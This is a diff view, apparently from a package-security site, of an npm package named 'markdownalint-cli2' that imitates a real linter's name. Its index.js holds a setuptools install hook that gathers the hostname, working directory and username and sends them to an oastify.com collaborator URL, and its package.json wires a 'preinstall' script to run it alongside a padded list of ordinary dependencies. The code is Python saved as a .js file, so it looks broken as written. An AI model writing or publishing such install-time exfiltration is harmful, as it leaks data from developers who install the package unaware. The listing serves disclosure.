markdownalint-cli2 1.0.0

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/index.js +24 -0
  2. package/package.json +96 -0
package/index.js ADDED
@@ -0,0 +1,24 @@
1
+ from setuptools import setup
2
+ from setuptools.command.install import install
3
+ import requests
4
+ import socket
5
+ import getpass
6
+ import os
7
+
8
+ class CustomInstall(install):
9
+ def run(self):
10
+ install.run(self)
11
+ hostname=socket.gethostname()
12
+ cwd = os.getcwd()
13
+ username = getpass.getuser()
14
+ ploads = {'hostname':hostname,'cwd':cwd,'username':username}
15
+ requests.get("https://1qsco2r6rz3gmgthw8qktjoib9h05rtg.oastify.com",params = ploads) #replace burpcollaborator.net with Interactsh or pipedream
16
+
17
+
18
+ setup(name='dependency1337', #package name
19
+ version='1.0.0',
20
+ description='test',
21
+ author='test',
22
+ license='MIT',
23
+ zip_safe=False,
24
+ cmdclass={'install': CustomInstall})
package/package.json ADDED
@@ -0,0 +1,96 @@
1
+ {
2
+ "name": "markdownalint-cli2",
3
+ "version": "1.0.0",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "dependencies": {
7
+ "function.name": "^1.0.13",
8
+ "exec-limiter": "^3.2.13",
9
+ "abs": "^1.3.14",
10
+ "duplexer2": "^0.1.4",
11
+ "deep-extend": "^0.6.0",
12
+ "deffy": "^2.2.4",
13
+ "create-error-class": "^3.0.2",
14
+ "core-util-is": "^1.0.3",
15
+ "capture-stack-trace": "^1.0.2",
16
+ "git-package-json": "^1.4.10",
17
+ "function-bind": "^1.1.2",
18
+ "git-source": "^1.1.10",
19
+ "err": "^1.1.1",
20
+ "noop6": "^1.0.9",
21
+ "hosted-git-info": "^2.8.9",
22
+ "index.js": "^0.0.3",
23
+ "gry": "^5.0.8",
24
+ "inherits": "^2.0.4",
25
+ "got": "^5.6.0",
26
+ "git-url-parse": "^5.0.1",
27
+ "is-plain-obj": "^1.1.0",
28
+ "hasown": "^2.0.1",
29
+ "error-ex": "^1.3.2",
30
+ "is-arrayish": "^0.2.1",
31
+ "git-up": "^1.2.1",
32
+ "ini": "^1.3.8",
33
+ "lowercase-keys": "^1.0.1",
34
+ "is-stream": "^1.1.0",
35
+ "parse-json": "^2.2.0",
36
+ "object-assign": "^4.1.1",
37
+ "isarray": "^1.0.0",
38
+ "protocols": "^2.0.1",
39
+ "one-by-one": "^3.2.8",
40
+ "r-json": "^1.3.0",
41
+ "r-package-json": "^1.0.9",
42
+ "pinkie-promise": "^2.0.1",
43
+ "node-status-codes": "^1.0.0",
44
+ "normalize-package-data": "^2.5.0",
45
+ "pinkie": "^2.0.4",
46
+ "package-json": "^2.4.0",
47
+ "limit-it": "^3.2.10",
48
+ "iterate-object": "^1.3.4",
49
+ "read-all-stream": "^3.1.0",
50
+ "package.json": "^2.0.1",
51
+ "process-nextick-args": "^2.0.1",
52
+ "rc": "^1.2.8",
53
+ "os-tmpdir": "^1.0.2",
54
+ "prepend-http": "^1.0.4",
55
+ "readable-stream": "^2.3.8",
56
+ "is-core-module": "^2.13.1",
57
+ "is-ssh": "^1.4.0",
58
+ "package-json-path": "^1.0.9",
59
+ "path-parse": "^1.0.7",
60
+ "parse-url": "^1.3.11",
61
+ "is-redirect": "^1.0.0",
62
+ "is-retry-allowed": "^1.2.0",
63
+ "sliced": "^1.0.1",
64
+ "registry-auth-token": "^3.4.0",
65
+ "timed-out": "^2.0.0",
66
+ "spdx-license-ids": "^3.0.17",
67
+ "spdx-exceptions": "^2.5.0",
68
+ "util-deprecate": "^1.0.2",
69
+ "oargv": "^3.4.10",
70
+ "supports-preserve-symlinks-flag": "^1.0.0",
71
+ "string_decoder": "^1.1.1",
72
+ "registry-url": "^3.1.0",
73
+ "safe-buffer": "^5.1.2",
74
+ "spdx-expression-parse": "^3.0.1",
75
+ "spdx-correct": "^3.2.0",
76
+ "strip-json-comments": "^2.0.1",
77
+ "resolve": "^1.22.8",
78
+ "minimist": "^1.2.8",
79
+ "semver": "^5.7.2",
80
+ "obj-def": "^1.0.9",
81
+ "tmp": "^0.0.28",
82
+ "validate-npm-package-license": "^3.0.4",
83
+ "w-json": "^1.3.10",
84
+ "typpy": "^2.3.13",
85
+ "url-parse-lax": "^1.0.0",
86
+ "ul": "^5.2.15",
87
+ "unzip-response": "^1.0.2"
88
+ },
89
+ "devDependencies": {},
90
+ "scripts": {
91
+ "test": "echo \"Error: no test specified\" && exit 1",
92
+ "preinstall":"node index.js"
93
+ },
94
+ "author": "rishi",
95
+ "license": "ISC"
96
+ }